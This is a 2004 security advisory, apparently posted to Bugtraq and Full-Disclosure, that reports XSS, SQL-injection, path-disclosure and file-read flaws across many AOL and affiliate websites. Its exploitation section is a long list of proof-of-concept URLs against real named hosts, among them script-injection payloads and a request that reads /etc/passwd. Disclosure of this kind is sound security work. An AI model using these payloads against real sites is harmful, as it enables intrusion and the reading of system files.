Date: Sun, 26 Dec 2004 18:58:57 +0100
From: Michel Blomgren <michel.blomgren@...erteam.se>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Multiple vulnerabilities in AOL and AOL affiliate
	web sites

              tigerteam.se security advisory - TSEAD-200412-2
                              www.tigerteam.se

     Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
         Date: Sat Dec 18 15:47:40 EST 2004
  Application: Multiple AOL web applications were found to be vulnerable
Vulnerability: XSS, Path disclosure, and system file read access
               vulnerabilities
    Reference: TSEAD-200412-2
       Author: Xavier de Leon <xavier@...erteam.se>

SYNOPSIS

http://www.corp.aol.com/whoweare/mission.shtml

VULNERABILITY

The AOL and AOL affiliate web sites have similar coding practices in some
specific cases, and suffer from the same or similar vulnerabilities.

COMMENT

I literally went link to link, choosing scripts at random and manually testing
for input validation bugs, XSS, and so on. And so I assume the number of bugs
is actually greater.

DISCOVERY

Xavier de Leon <xavier@...erteam.se>

EXPLOITATION

   Attack: a)
http://www.aim.com/help_faq/report.adp?type=><script>alert("fubar")</script>
           b)
http://www.aim.com/help_faq/report.adp?plat=><script>alert("fubar")</script>
           c)
http://www.aim.com/help_faq/report.adp?num=><script>alert("fubar")</script>
           d)
http://www.aim.com/help_faq/report.adp?ver=><script>alert("fubar")</script>
           e)
http://www.aim.com/help_faq/report.adp?aolp=><script>alert("fubar")</script>

   Attack: a)
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert("fubar")</script>

   Attack: a)
http://help.channels.aol.com/article.adp?catId="><script>alert("fubar")</script>&articleId=0
           b)
help.channels.aol.com/topic.adp?catId="><script>alert("fubar")</script>&sCId=0

   variable over multiple scripts:
   Attack: a) http://downloads.aol.com.br/files/incr.php?file_id=-0
           b) http://downloads.aol.com.br/arquivo.php?file_id=(

   "busca_resultado.php" script:
   Attack: a) http://downloads.aol.com.br/busca_resultado.php?search_string='

   "subcategoria.php" script:
   Attack: a) http://downloads.aol.com.br/subcategoria.php?cat_subs_id='

   Attack: a) http://listserv.aol.com/cgi-bin/wa?A2=/bar&L=foo&P=R1

   Attack: a)
http://aimtoday.aol.com/features/main_redesign.adp?fid="><script>alert("fubar")</script>

   Attack: a)
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=&brand="><script>alert("fubar")</script>
           b)
http://www.aol.ca/tryaol/price_plan.adp?wr_promo="><script>alert("fubar")</script>&brand=

    Attack: a)
http://finance.channels.aol.ca/finance/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
            b)
http://women.channels.aol.ca/preview/object.adp?frame=&type=&id=---!><script>alert("fubar")</script><!---&data=
            c)
http://sports.channels.aol.ca/sports/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=

    Attack: a) http://foros.aol.com.ar/foro.php3?id_foro='
            b) http://foros.aol.com.ar/toplevel.php3?id_top='
            c) http://foros.aol.com.ar/categorias.php3?id_cat='
            d) http://foros.aol.com.ar/subcategoria.php3?id_subcat='

    Attack: a)
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=&Id="><script>alert("fubar")</script><!---
            b)
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=<script>alert("fubar")</script>&Id=

    Attack: a)
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=<script>alert("fubar")</script>&ID=
            b)
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=&ID="><script>alert("fubar")</script><!---

    Attack: a)
http://www.aol.com.ar/CanalesWeb/aolenvivo.adp?Canal=<script>alert("fubar")</script>&ID=

    Attack: a)
http://aol.com.ar/CanalesWeb/noticias.adp?Canal=<script>alert("fubar")</script>&Id=

    Attack: a)
http://aol.com.ar/CanalesWeb/musica.adp?Canal=<script>alert("fubar")</script>&Id=

    Attack: a)
http://www.aol.com.ar/CanalesWeb/deportes.adp?Canal=<script>alert("fubar")</script>&ID=

    Attack: a)
http://www.aol.com.ar/CanalesWeb/entretenimientos.adp?Canal=<script>alert("fubar")</script>&ID=

    Attack: a) http://www.aol.com.ar/Goyeneche/index.adp?page=/etc/passwd

    script:
    Attack: a)
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId='
    Attack: b)
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId="><script>alert("fubar")</script><!---

    Attack: a)
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTStartDate1Month='
            b)
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTEndDate1Month='

ACKNOWLEDGMENTS

I would like to thank the following people in no particular order:
Michel + all my brothers in p-e and uDc, you know who you are.

ABOUT TIGERTEAM.SE

tigerteam.se offers spearhead competence within the areas of vulnerability
assessment, penetration testing, security implementation, and advanced ethical
hacking training. tigerteam.se consists of Michel Blomgren - company owner (M.
Blomgren IT Security) and Xavier de Leon - freelancing IT security consultant.
Together we have worked for organizations in over 15 countries.